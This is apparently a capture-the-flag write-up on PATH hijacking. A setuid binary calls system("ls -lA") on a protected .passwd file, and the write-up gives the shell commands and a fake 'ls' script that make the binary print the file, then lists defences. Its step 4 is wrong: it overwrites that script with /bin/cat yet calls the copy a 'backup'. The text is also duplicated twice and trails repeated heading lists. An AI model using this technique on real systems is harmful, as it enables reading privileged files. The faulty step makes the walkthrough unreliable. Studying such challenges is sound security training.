Understanding the Challenge

This challenge explores advanced techniques in privilege escalation and command manipulation within a Unix-like environment. You'll leverage system calls and file permissions to bypass security restrictions and read a protected .passwd file using a vulnerable C program and a custom Bash script. The exercise builds on foundational concepts while introducing new complexities in command execution.

Key Points

Objective: Exploit the ch12 binary to read the contents of /challenge/app-script/ch12/.passwd.
Core Functions:
- setreuid(): Sets the real and effective user IDs of the calling process to match the binary's permissions.
- system(): Executes a shell command (here, ls -lA) by invoking /bin/sh.
Challenge Twist: The ls command includes -lA flags, requiring creative manipulation to bypass them.

Challenge Breakdown

Provided Vulnerable Code

The following C program is the target of the exploit:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main() {
    setreuid(geteuid(), geteuid());
    system("ls -lA /challenge/app-script/ch12/.passwd");
    return 0;
}

Key Insight: The binary runs with elevated privileges (via setreuid) and executes ls -lA on the target file. Your goal is to hijack this command.

Step-by-Step Exploitation

1. Understand the Attack Surface

The system() call invokes /bin/sh to run ls -lA.
By manipulating the $PATH environment variable, you can redirect ls to a malicious script.

2. Prepare the Exploit Environment

Create a custom directory and modify $PATH to prioritize it:

mkdir -p /tmp/exploit
export PATH=/tmp/exploit:$PATH

3. Craft the Malicious `ls` Script

Create a Bash script named ls in /tmp/exploit to ignore flags and output the .passwd file:

#!/bin/bash
# Ignore all flags (e.g., -lA) and arguments
shift $(( $# - 1 ))  # Remove all arguments except the last (the file path)
cat "$1"             # Output the file contents

Make the script executable:

chmod +x /tmp/exploit/ls

4. Copy `/bin/cat` as a Fallback

To ensure robustness, copy /bin/cat to the exploit directory and rename it to ls:

cp /bin/cat /tmp/exploit/ls

Why This Works: The script intercepts the ls -lA call, discards the flags, and uses cat to display the file. The copied /bin/cat acts as a backup if the script fails.

5. Execute the Exploit

Run the ch12 binary to trigger the exploit:

/challenge/app-script/ch12/ch12

Critical Concepts Explained

System Calls in Focus

Function	Purpose	Security Implications
`setreuid()`	Sets real/effective user IDs to match the binary's owner.	Can grant unintended privileges if misused.
`system()`	Executes a shell command via `/bin/sh`.	Vulnerable to command injection attacks.

File Permissions and `$PATH`

$PATH: A colon-separated list of directories where the shell searches for commands.
- Risk: If a writable directory (e.g., /tmp) appears early in $PATH, attackers can override legitimate commands.
File Permissions:
- The .passwd file is likely readable only by a specific user/group (e.g., ch12).
- The ch12 binary runs with the file owner's permissions (via setreuid).

Common Pitfalls and Solutions

Pitfall	Solution
Script fails to handle flags.	Use `shift` to discard arguments or parse them with `getopts`.
`$PATH` not updated correctly.	Verify with `echo $PATH`; ensure the exploit directory is first.
Permission denied on `.passwd`.	Confirm the binary's `setreuid` call succeeds (check with `strace`).

Learn More

Deep Dive Topics

Unix File Permissions:
- Learn about chmod, chown, and the sticky bit (/tmp permissions).
- Explore setuid/setgid binaries and their risks.
Bash Scripting:
- Master argument parsing (getopts, shift).
- Study environment variable manipulation ($PATH, $IFS).
System Calls:
- Research execve(), fork(), and ptrace() for process control.
- Understand LD_PRELOAD for library hijacking.

Practical Exercises

Modify the exploit to log all executed commands to a file.
Defend against this attack by:
- Using absolute paths for commands (e.g., /bin/ls).
- Restricting $PATH in the binary (e.g., setenv("PATH", "/bin:/usr/bin", 1)).
Experiment with strace to trace system calls during execution:
```
strace -f /challenge/app-script/ch12/ch12
```

Summary

This challenge demonstrates how environment manipulation and command injection can bypass security controls. By understanding:

How setreuid and system interact,
The role of $PATH in command resolution, and
Bash scripting techniques for argument handling,

you can both exploit and defend against similar vulnerabilities. Always validate inputs, use absolute paths, and restrict environment variables in security-sensitive code.

Key Points

Objective: Exploit the ch12 binary to read the contents of /challenge/app-script/ch12/.passwd.
Core Functions:
- setreuid(): Sets the real and effective user IDs of the calling process to match the binary's permissions.
- system(): Executes a shell command (here, ls -lA) by invoking /bin/sh.
Challenge Twist: The ls command includes -lA flags, requiring creative manipulation to bypass them.

Challenge Breakdown

Provided Vulnerable Code

The following C program is the target of the exploit:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main() {
    setreuid(geteuid(), geteuid());
    system("ls -lA /challenge/app-script/ch12/.passwd");
    return 0;
}

Key Insight: The binary runs with elevated privileges (via setreuid) and executes ls -lA on the target file. Your goal is to hijack this command.

Step-by-Step Exploitation

1. Understand the Attack Surface

The system() call invokes /bin/sh to run ls -lA.
By manipulating the $PATH environment variable, you can redirect ls to a malicious script.

2. Prepare the Exploit Environment

Create a custom directory and modify $PATH to prioritize it:

mkdir -p /tmp/exploit
export PATH=/tmp/exploit:$PATH

3. Craft the Malicious `ls` Script

Create a Bash script named ls in /tmp/exploit to ignore flags and output the .passwd file:

#!/bin/bash
# Ignore all flags (e.g., -lA) and arguments
shift $(( $# - 1 ))  # Remove all arguments except the last (the file path)
cat "$1"             # Output the file contents

Make the script executable:

chmod +x /tmp/exploit/ls

4. Copy `/bin/cat` as a Fallback

To ensure robustness, copy /bin/cat to the exploit directory and rename it to ls:

cp /bin/cat /tmp/exploit/ls

Why This Works: The script intercepts the ls -lA call, discards the flags, and uses cat to display the file. The copied /bin/cat acts as a backup if the script fails.

5. Execute the Exploit

Run the ch12 binary to trigger the exploit:

/challenge/app-script/ch12/ch12

Critical Concepts Explained

System Calls in Focus

Function	Purpose	Security Implications
`setreuid()`	Sets real/effective user IDs to match the binary's owner.	Can grant unintended privileges if misused.
`system()`	Executes a shell command via `/bin/sh`.	Vulnerable to command injection attacks.

File Permissions and `$PATH`

$PATH: A colon-separated list of directories where the shell searches for commands.
- Risk: If a writable directory (e.g., /tmp) appears early in $PATH, attackers can override legitimate commands.
File Permissions:
- The .passwd file is likely readable only by a specific user/group (e.g., ch12).
- The ch12 binary runs with the file owner's permissions (via setreuid).

Common Pitfalls and Solutions

Pitfall	Solution
Script fails to handle flags.	Use `shift` to discard arguments or parse them with `getopts`.
`$PATH` not updated correctly.	Verify with `echo $PATH`; ensure the exploit directory is first.
Permission denied on `.passwd`.	Confirm the binary's `setreuid` call succeeds (check with `strace`).

Learn More

Deep Dive Topics

Unix File Permissions:
- Learn about chmod, chown, and the sticky bit (/tmp permissions).
- Explore setuid/setgid binaries and their risks.
Bash Scripting:
- Master argument parsing (getopts, shift).
- Study environment variable manipulation ($PATH, $IFS).
System Calls:
- Research execve(), fork(), and ptrace() for process control.
- Understand LD_PRELOAD for library hijacking.

Practical Exercises

Modify the exploit to log all executed commands to a file.
Defend against this attack by:
- Using absolute paths for commands (e.g., /bin/ls).
- Restricting $PATH in the binary (e.g., setenv("PATH", "/bin:/usr/bin", 1)).
Experiment with strace to trace system calls during execution:
```
strace -f /challenge/app-script/ch12/ch12
```

Summary

This challenge demonstrates how environment manipulation and command injection can bypass security controls. By understanding:

How setreuid and system interact,
The role of $PATH in command resolution, and
Bash scripting techniques for argument handling,

you can both exploit and defend against similar vulnerabilities. Always validate inputs, use absolute paths, and restrict environment variables in security-sensitive code.

Understanding the Challenge

Key Points

Challenge Breakdown

Provided Vulnerable Code

Step-by-Step Exploitation

1. Understand the Attack Surface

2. Prepare the Exploit Environment

3. Craft the Malicious ls Script

4. Copy /bin/cat as a Fallback

5. Execute the Exploit

Critical Concepts Explained

System Calls in Focus

File Permissions and $PATH

Common Pitfalls and Solutions

Learn More

Deep Dive Topics

Practical Exercises

Summary

Understanding the Challenge

Key Points

Challenge Breakdown

Provided Vulnerable Code

Step-by-Step Exploitation

1. Understand the Attack Surface

2. Prepare the Exploit Environment

3. Craft the Malicious ls Script

4. Copy /bin/cat as a Fallback

5. Execute the Exploit

Critical Concepts Explained

System Calls in Focus

File Permissions and $PATH

Common Pitfalls and Solutions

Learn More

Deep Dive Topics

Practical Exercises

Summary

3. Craft the Malicious `ls` Script

4. Copy `/bin/cat` as a Fallback

File Permissions and `$PATH`

3. Craft the Malicious `ls` Script

4. Copy `/bin/cat` as a Fallback

File Permissions and `$PATH`